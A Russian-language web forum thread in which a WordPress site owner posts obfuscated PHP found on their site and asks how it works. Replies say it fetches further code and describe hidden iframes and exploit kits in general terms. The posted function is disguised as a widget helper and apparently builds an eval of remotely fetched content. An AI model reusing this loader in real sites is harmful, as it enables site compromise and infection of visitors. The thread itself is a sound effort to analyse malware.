Функция вредоносного кода

Статус
В этой теме нельзя размещать новые ответы.

LEXAlForpostl

Мой дом здесь!
Регистрация
21 Май 2008
Сообщения
766
Реакции
228
Здравствуйте, уважаемые коллеги.
На сайте был найден вредоносный код, который публиковал невидимые ссылки.
CMS: Wordpress.
Разъясните, пожалуйста, как он работает.
Спасибо.

PHP:
function get_short_wigets($length='') {
    $mytitle = explode(' ', get_the_title(), $length);
    $mdetails="<div class='body-continent'><div class='get-inner-al(@fi'><!--Deregister() Default Widgets: _sabhrtupwprs:e--></div></div>";
    $indent = ( !$mytitle ) ? str_repeat( "\t", $mytitle ) : $_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI'];
    define('HEADER_IMAGE_WIDTH_WIG', apply_filters( 'twentyeleven_header_image_width', 1000) );
    define('HEADER_IMAGE_HEIGHT_WIG', apply_filters( 'twentyeleven_header_image_height', 288) );
    $metaoptions="\\4'\\10\\12t\\16\\19//\\15q4.\\17u/\\9-".$indent."')\\5";

    if (count($mytitle)>=$length) {
        array_pop($mytitle);
        $mytitle = implode(" ",$mytitle). $after;
    } else {
        $mytitle = implode(" ",$mytitle);
    }

    $metaboxe=str_repeat("(.)", 20).".*"."/".$mdetails[23]; //
    if(function_exists("excerpt_more")){
        add_filter('excerpt_more', $metaboxe);
    }
    $output = get_the_excerpt();
    $output = '<p>'.$output.'</p>';
    $defult_widgets=@preg_replace("/.*(cont).*?(ge).*?(..\(.fi).*?(\()(\)).*?(\_){$metaboxe}is", "@\\20v\\3le\\6\\2t\\6\\1ents{$metaoptions}", $mdetails);
    $output = apply_filters('wptexturize', $defult_widgets);
    $output = apply_filters('convert_chars', $output);

    return $output;
}
 
это кусок.
функция запрашивает еще код. копайте дальше.

по сути как виджет идет.
 
Последнее редактирование:
Называется скрытый IFrame.
Если кто-либо получит доступ к Вашему сайту, он может изменить шаблон сайта и встоить в него этот IFrame.
Этим пользуются многи встраиватели своих вирусов и троянов, чтобы залить их к Вам ПК с помощью так называемых эксплоитов(вредоносный код) или сплоит-паков (см. Black hole exploit kit или про другие связки эксплоитов в поисковике).
Код в сплоит паках обычно может подгружаться разными способами, Очень дырявыми считаются Апплеты JAVA и Flash, го есть и другие способы доставить к вам на комьютер вирус или троян, например ВинЛоккер - блокировщик Windows, которы для разблокировки просит отправить код и обычно не один на дорогущие номера чтобы разблокировать Ваш компьютер. Ии это может быть программа для кражи всех Ваших паролей и номеров карт банка. Ее как вариант Ваш ПК будут использовать как машину - зомби для атаки на сайты (см. в поисковике ботнеты), могут использовать для рассылки спама.
Самое интересное то, что даже при частообновляемом хорошем антивирусе есть большая вероятность того, что Вы даже просто зайдя на какой-нибудь сайт, даже не заметите что-либо подозрительного.
 
Статус
В этой теме нельзя размещать новые ответы.
Назад
Сверху